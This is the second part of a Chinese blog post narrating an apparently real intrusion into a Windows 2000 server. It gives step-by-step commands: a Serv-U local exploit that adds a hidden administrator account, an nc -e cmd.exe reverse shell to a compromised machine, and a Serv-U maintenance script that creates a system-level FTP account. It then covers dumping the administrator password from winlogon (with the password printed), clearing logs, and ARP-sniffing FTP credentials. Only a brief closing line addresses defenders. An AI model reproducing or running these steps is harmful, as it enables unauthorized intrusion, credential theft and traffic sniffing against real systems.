二、
charey 睡觉去了~晕~把最简单的部分交给我这个菜鸟做~呵呵~我和他是个宿舍的~和他真的学了不少的东西~嘿嘿~ 去睡觉的时候他告诉我说这台机子开了防火墙~晕~开了这个东西的机子想进去真的有些难~还好最近新出了几个工具~~这台机子开了serv-u 服务，我就从这里入手吧，最近在小凤居出了个新的工具------Serv-u Local Exploit，是fantasy告诉我的~我也没有用过，不知道怎么用~郁闷~~！！！不理他先了~我下载一个下来看看不就知道怎么用了吗~？呵呵~看了他的说明，很简单哦serv-u .exe "command" 其中"command"听说可以以管理员的权限运行命令，嘿嘿，用ASP免FSO的木马把工具传上去，用冰狐的客户端运行他，serv-u.exe "net user kkb$ 830306 /add" 提示成功，嘿嘿，我在提升kkb$为管理员，serv-u.exe "net localgroup administrators kkb$ /add"又提示成功了，好简单就让我完成了，呵呵。fantasy 在去睡觉之前说这台机子还开了3389终端服务，现在什么都OK了，我拿出了3389终端连接器连接上去，晕！！！！！连不上，难道不开？？我郁闷，不理它，先传个cmd.asp 上去，运行命令。net start看看开什么服务
已经启动以下 Windows 2000 服务: 

………………
………………
Terminal Services
Windows Installer
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensions
Workstation
World Wide Web Publishing Service

Terminal Services这个不是3389的终端服务吗？既然开了，那么一定是改了端口了，不理他，我运行netstat -an 看看他开了什么服务，开的服务如下 
…………………………
……………………
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4990 0.0.0.0:0 LISTENING
TCP 0.0.0.0:4991 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8933 0.0.0.0:0 LISTENING
这个开的端口就8933很象是连接的端口了，我用3389终端登陆器等上去，呵呵，和我想的一样，果然是8933，二话没说填上kkb$密码830306连接，晕~提示无效用户，我又郁闷~！！！我想是不是serv-u.exe的问题啊~因为毕竟是第一次用啊，可能刚刚没有添加成功。算了，新工具用不了就用nc配合添加serv-u的系统帐号吧，我把NC传上那台机子上面，同时在我的一台肉鸡上运行nc -v -l -p 1234
配合刚刚用的nc -e cmd.exe IP PORT 得到一个guest权限的shell
写一个txt文档，传到他上面，内容如下
USER localadministrator
PASS #l@$ak#.lk;0@P
SITE MAINTENANCE
-SETUSERSETUP
-IP=61.143.251.***
-PortNO=21
-User=kkb
-Password=830306
-HomeDir=c:\\

-Maintenance=System
-RelPaths=1
Access=c:\|RWAMELCDP
保存为b.txt

添加一个FTP帐号，是系统权限的。再来到刚刚得的那个shell下运行
nc -vv 127.0.0.1 43958 提示
save setting
成功1`！~！用FTP登陆下
进入C盘
为了防止不能添加用户。我采用偷他密码的方法。（有时候他有密码策略，所以会出现添加用户失败）用FTP传pulist.exe和findpass.exe上去。在本地编辑一个bat文件，内容是
c:\winnt\twain_32\pulist.exe >a.txt
把会显的内容写进A.TXT 
在FTP里应该这样
ftp>quote site exec a.bat

下载a.txt看看进程和对应的PID值
winlogon.exe 对应的PID值是1252
然后再编辑a.bat
c:\winnt\twain_32\findpass 机器名 管理员名 winlogin.exe的PID值
OK。在下载A。TXT，看到密码了哈哈
To Find Password in the Winlogon process
Usage: c:\winnt\twain_32\findpass.exe DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.
The WinLogon process id is 2512 (0x000009d0).
To find SUPERRRABBIT\D1haokan123.com.net password in process 2512 ...
The encoded password is found at 0x00800800 and has a length of 15.
The logon information is: SUPERRRABBIT/administrator/netChina.com123.
The hash byte is: 0x2a.

密码是netChina.com123
然后就是用他登陆，了。清理日志。然后传嗅探工具arpsniff.exe winpcap.exe
运行
arpsniff 61.143.251.1 61.143.251.** 21 a.txt 0
开始漫长的等待。

由于还没有嗅到密码我就发文章了。呵呵
现在得上去看看得密码没有
呵呵。
还要多谢 sykkk 
是他教我们学会嗅探的。

这里没有什么技术可言，都是一些经验。希望能对一些人有帮助。还有，嗅探这招比较毒，如果在我们学校的机子里有一台被拿下的话。其他的主机也有危险。------------------希望网管们注意这个古老的入侵方法，做好防范。

上一页  [1] [2]